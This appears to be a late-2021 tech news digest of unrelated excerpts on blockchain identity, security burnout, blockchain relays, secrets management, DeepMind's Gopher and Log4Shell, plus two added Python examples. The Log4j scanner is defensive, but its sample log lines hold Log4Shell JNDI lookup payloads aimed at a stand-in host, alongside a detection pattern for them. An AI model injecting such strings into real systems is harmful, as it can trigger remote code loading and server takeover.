Why a Little-Known Blockchain-Based Identity Project in Ethiopia Should Concern Us All
We have countless examples of the dangers of national ID schemes in general,
including from Kenya, Uganda, Pakistan, India and elsewhere. But while national
ID schemes can be highly problematic, building them on blockchain could be
catastrophic. Putting aside the very obvious logistical hurdles, including very
low internet penetration rates in Ethiopia (that are significantly lower in more
rural regions) and the displacement of children from schools due to ongoing
conflict and humanitarian challenges, there are much deeper problems with
Hoskinson’s plans. Blockchain is fundamentally an accounting technology designed
to track and trace digital assets through an immutable ledger of transactions.
Blockchain-based ID schemes similarly treat identity as a transactional,
mathematical problem. The more transactions, the more profitable for the
network. There are also serious privacy and data protection concerns with the
logging of all this metadata. While proponents of blockchain-based ID claim that
concerns are unfounded if the system is designed correctly and identity
documents are kept off ledger, the dangers of metadata in this
context are well-documented.
Everyone is burned out. That's becoming a security nightmare
In many organisations, it's cybersecurity staff who are there to counter
activity that could make the network vulnerable to cyberattacks – but according
to the paper, cybersecurity professionals are more burned out than other
workers. The research suggests that 84% of security professionals are feeling
burned out, compared with 80% of other workers. And when cybersecurity employees
are burned out, they're more than likely to describe themselves as "completely
checked out" and "doing the bare minimum at work" – something that one in 10
cybersecurity professionals described as their state of mind compared with one
in 20 of other employees. That attitude could easily result in security threats
being missed or flaws not being fixed in time, something that could put the
whole company at risk from cyber incidents. "Pandemic-fueled burnout – and
resultant workplace apathy and distraction – has emerged as the next significant
security risk," said Jeff Shiner, chief executive officer at 1Password. "It's
particularly surprising to find that burned-out security leaders, charged with
protecting businesses, are doing a far worse job of following security
guidelines – and putting companies at risk".
How Can We Get Blockchains to Talk to Each Other?
Solving this problem is a booming area of research though, and last month
Schulte and his colleagues presented a potential workaround at the IEEE
International Conference on Blockchain Computing and Applications. Their
approach relies on blockchain relays, which are essentially smart contracts
running on one blockchain that can verify events on another blockchain. If a
user wants to transfer an asset they first destroy, or “burn,” it on the
source blockchain, which is typically done by sending the asset to a user
address that doesn’t exist. This transaction also includes details of the
asset and which blockchain and user they want to send it to. Third parties
monitor the source blockchain for these burn transactions and then send them
to the relay for a small reward, which verifies the burn transaction and
recreates the asset on the new blockchain. The challenge, says Schulte, is
that these verification processes invoke transaction fees that can quickly
make the approach impractical. So they created a verification on-demand system
where the relay assumes transactions are valid unless they are
disputed.
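A minimal model of the burn, relay and on-demand verification flow described above. This is an added example, not code from Schulte's team; the class names, the dispute window and the set-membership check standing in for a real proof against source-chain headers are all assumptions.

```python
import hashlib
from dataclasses import dataclass

DISPUTE_WINDOW = 10  # destination-chain blocks; constructed value (assumption)

def tx_id(asset: str, dest: str, recipient: str) -> str:
    return hashlib.sha256(f"{asset}|{dest}|{recipient}".encode()).hexdigest()

class SourceChain:
    """Stand-in for the source ledger: only remembers which burns happened."""
    def __init__(self):
        self.burns = set()

    def burn(self, asset, dest, recipient):
        tid = tx_id(asset, dest, recipient)
        self.burns.add(tid)
        return tid

@dataclass
class Claim:
    asset: str
    recipient: str
    submitted_at: int
    status: str = "pending"  # pending -> minted | rejected

class Relay:
    """Relay contract on the destination chain with on-demand verification."""
    def __init__(self, source, name):
        self.source, self.name = source, name
        self.claims, self.minted = {}, {}

    def submit(self, asset, dest, recipient, height):
        if dest != self.name:
            raise ValueError("burn targets a different chain")
        tid = tx_id(asset, dest, recipient)
        if tid in self.claims:
            raise ValueError("burn already relayed (replay)")
        self.claims[tid] = Claim(asset, recipient, height)  # accepted unverified
        return tid

    def dispute(self, tid):
        """Costly check against the source chain; runs only when challenged."""
        claim = self.claims[tid]
        if claim.status == "pending" and tid not in self.source.burns:
            claim.status = "rejected"
        return claim.status

    def finalize(self, tid, height):
        """Recreate the asset once the dispute window passed unchallenged."""
        claim = self.claims[tid]
        if claim.status == "pending" and height >= claim.submitted_at + DISPUTE_WINDOW:
            claim.status = "minted"
            self.minted[claim.asset] = claim.recipient
        return claim.status
```

The design only holds if someone watches pending claims and disputes bad ones inside the window: a claim nobody challenges is minted without ever being checked.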
DeFi architect Andre Cronje said it’s time to give up on the inaccurate term “decentralized finance”
“We aren’t decentralized, the old guard will keep trying to use it as their
“attack” vector,” he added in a disheartening tone, as he proposed a couple of
alternative coined terms. According to Cronje, “open finance” or “web3
finance” present some better-suited options that would describe the sector
more accurately. Cronje’s unreserved commentary is tough to challenge–thanks
to his vast experience and track record. After launching Yearn in 2020, Andre
made a move that granted him a somewhat legendary status in the crypto
community–he chose to distribute all YFI tokens amongst liquidity providers,
without withholding any for himself, or the Yearn development fund. Some of
Cronje’s recent projects include the decentralized stablecoin exchange
protocol Fixed Forex, and Keep3r Network, which facilitates the interaction
between those looking for external developers and job executors–known as
Keepers. He was also involved in developing Fantom–a highly scalable Layer 1
blockchain.
DevOps Teams Struggling to Keep Secrets
From Carson’s perspective, secrets management is the ability to move away from
hardcoded passwords or static keys to just-in-time privileges or one-time-use
passwords so that even when compromised they cannot be used. “Many privileged access
management solutions that protected privileged access for years have extended
functionality to developers to help move the value into DevOps so they can
manage credentials for applications, databases, CI/CD tools and services
without causing friction in the development process,” he said. Approaches like
privileged access security help enable API-as-a-service and provide instant
availability of secrets, SSH keys, certificates, API keys and tokens. Bambenek
added the problem isn’t choosing a secrets management process or tool, but
rather that they aren’t in place at all. “Pick something that will keep keys
and secrets out of public cloud repositories that developers will use that
allows for quick and easy rotation of keys as the need arises,” he
said.
DeepMind debuts massive language A.I. that approaches human-level reading comprehension
DeepMind’s language model, which it calls Gopher, was significantly more
accurate than these existing ultra-large language models on many tasks,
particularly answering questions about specialized subjects like science and
the humanities, and equal or nearly equal to them in others, such as logical
reasoning and mathematics, according to the data DeepMind published. This was
the case despite the fact that Gopher is smaller than some ultra-large
language software. Gopher has some 280 billion different parameters, or
variables that it can tune. That makes it larger than OpenAI’s GPT-3, which
has 175 billion. But it is smaller than a system that Microsoft and Nvidia
collaborated on earlier this year, called Megatron, that has 535 billion, as
well as ones constructed by Google, with 1.6 trillion parameters, and Alibaba,
with 10 trillion. Ultra-large language models have big implications for
business: they have already led to more fluent chatbots and digital
assistants, more accurate translation software, better search engines, and
programs that can summarize complex documents.
Dangerous “Log4j” security vulnerability affects everything from Apple to Minecraft
This vulnerability was discovered by Chen Zhaojun of the Alibaba Cloud
Security Team. Any service that logs user-controlled strings was vulnerable to
the exploit. The logging of user-controlled strings is a common practice by
system administrators in order to spot potential platform abuse, though those
strings should then be “sanitized” — the process of cleaning user input to
ensure that there is nothing harmful to the software being submitted. The
exploit has been dubbed “Log4Shell”, as it’s an unauthenticated RCE
vulnerability that allows for total system takeover. There’s already a
proof-of-concept exploit online, and it’s ridiculously easy to demonstrate
that it works through the use of DNS logging software. If you remember the
Heartbleed vulnerability from a number of years ago, Log4Shell definitely
gives it a run for its money when it comes to severity. “Similarly to other
high-profile vulnerabilities such as Heartbleed and Shellshock, we believe
there will be an increasing number of vulnerable products discovered in the
weeks to come,” the Randori Attack Team said in their blog today.
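For defenders, a first triage step is to look for Log4j lookup expressions that arrived in logged, user-controlled fields. The scanner below is an added example, not part of the quoted article; the sample access-log lines are constructed and the verdict labels are its own.

```python
import re
from urllib.parse import unquote

# Log4j 2 expands "${...}" lookups in logged text; Log4Shell abused the "jndi" lookup.
JNDI = re.compile(r"\$\{[^}]*jndi\s*:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{")

def decode(text: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so encoded requests are matched too."""
    for _ in range(rounds):
        nxt = unquote(text)
        if nxt == text:
            break
        text = nxt
    return text

def classify(line: str) -> str:
    text = decode(line)
    if JNDI.search(text):
        return "jndi-lookup"    # check the service that wrote this line
    if ANY_LOOKUP.search(text):
        return "lookup-syntax"  # another lookup expression in logged input
    return "clean"

def scan(lines):
    """Return (line_number, verdict) for every line that is not clean."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := classify(line)) != "clean"]

# Constructed sample lines (documentation addresses, example.invalid host).
SAMPLE = [
    '192.0.2.10 - - [10/Dec/2021:09:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Dec/2021:09:00:07 +0000] "GET /search?q=test HTTP/1.1" '
    '200 310 "-" "${jndi:ldap://example.invalid/a}"',
    '192.0.2.45 - - [10/Dec/2021:09:00:09 +0000] '
    '"GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%2Fb%7D HTTP/1.1" '
    '404 0 "-" "curl/7.79"',
    '192.0.2.46 - - [10/Dec/2021:09:00:12 +0000] "GET /?x=${date:yyyy} HTTP/1.1" '
    '200 98 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE):
        print(number, verdict)
```

A match shows that a lookup string reached the log, not that it was evaluated; whether the host was affected depends on the Log4j version running behind that log.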
It’s time for tech to embrace security by design
Basic cybersecurity hygiene is the key to protecting your devices against the
most common types of malware, but we also need security built into technology
to prevent these sophisticated cyberattacks. The Secret Service is certainly
best known for protecting the president. But its other primary mission is to
safeguard the nation’s financial infrastructure and payment systems to
preserve the integrity of the economy from a wide range of financial and
electronic crimes, including U.S. counterfeit currency, bank and financial
institution fraud, illicit financing operations, identity theft, access device
fraud and cybercrimes. With the prevalence of mobile devices in today’s world,
that means that, as the Department of Homeland Security (DHS) recommends,
“users should avoid — and enterprises should prohibit on their devices —
sideloading of apps and the use of unauthorized app stores.” The pandemic has
been a boon to cybercriminals, taking “advantage of an opportunity to profit
from our dependence on technology to go on an internet crime spree,” said Paul
Abbate, deputy director of the Federal Bureau of Investigation.
Simulating matter on the quantum scale with AI
Although DFT proves a mapping exists, for more than 50 years the exact nature
of this mapping between electron density and interaction energy — the
so-called density functional — has remained unknown and has to be
approximated. Despite the fact that DFT intrinsically involves a level of
approximation, it is the only practical method to study how and why matter
behaves in a certain way at the microscopic level and has therefore become one
of the most widely used techniques in all of science. Over the years,
researchers have proposed many approximations to the exact functional with
varying levels of accuracy. Despite their popularity, all of these
approximations suffer from systematic errors because they fail to capture
certain crucial mathematical properties of the exact functional. By expressing
the functional as a neural network and incorporating these exact properties
into the training data, we learn functionals free from important systematic
errors — resulting in a better description of a broad class of chemical
reactions.
A Paradigm Shift in App Delivery
As the shift to cloud accelerates, organizations are also looking for ways to
reduce risk as they deliver apps over the cloud. “I think recently the
pandemic has made every digital business an experience-delivery company,”
Gupta said. “If you talked about transition to cloud and SaaS a few years
back, everybody was going towards it. But the question now is how fast I can
go, and how confidently while reducing the risk I can achieve with a hyper
transition to the cloud and it’s [creation of] a lot of new opportunities and
challenges.” Another main reason organizations are making the shift to
cloud-based deployments is to benefit from “auto-scaling,” Gupta said. “But
the challenge with auto-scaling is that you have to do a lot of guesswork
about CPU and memory… and if your intent or requirements change, you must go
back to square one and repeat that cycle multiple times,” Gupta said. This is
among the reasons why organizations are increasingly rethinking their
application-delivery approaches. “This is the time to look at your
application-delivery infrastructure and to take a new radical approach to
build a new application delivery and security infrastructure,” Gupta said.
Quote for the day:
"It is time for a new generation of
leadership to cope with new problems and new opportunities for there is a
new world to be won." -- John E Kennedy